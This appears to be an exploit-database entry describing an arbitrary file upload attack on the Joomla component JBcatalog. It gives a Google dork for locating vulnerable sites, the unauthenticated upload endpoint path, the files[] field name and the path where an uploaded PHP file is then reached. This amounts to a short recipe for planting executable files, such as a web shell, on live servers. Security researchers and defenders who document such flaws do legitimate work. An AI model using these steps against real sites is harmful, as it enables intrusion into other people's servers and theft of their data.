# Exploit Title: Joomla Component JBcatalog - Arbitrary File Upload
# Google Dork: inurl:/components/com_jbcatalog/
# Date: 16 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu
Proof of Concept
1. Check Vulnerability.
https://web-target/[path]/components/com_jbcatalog/libraries/jsupload/server/php/
View image : https://3.bp.blogspot.com/-6zLFQMaKCZg/WjU2Aqup4iI/AAAAAAAAABY/5qOv91kTdYkC-nhyZYtBwqcPtVtWitJGwCEwYBhgL/s1600/Screenshot%2Bfrom%2B2017-12-16%2B21-53-38.png
2. Array type Upload : files[]
3. Check file uploaded.
https://web-target/com_jbcatalog/libraries/jsupload/server/php/files/file.php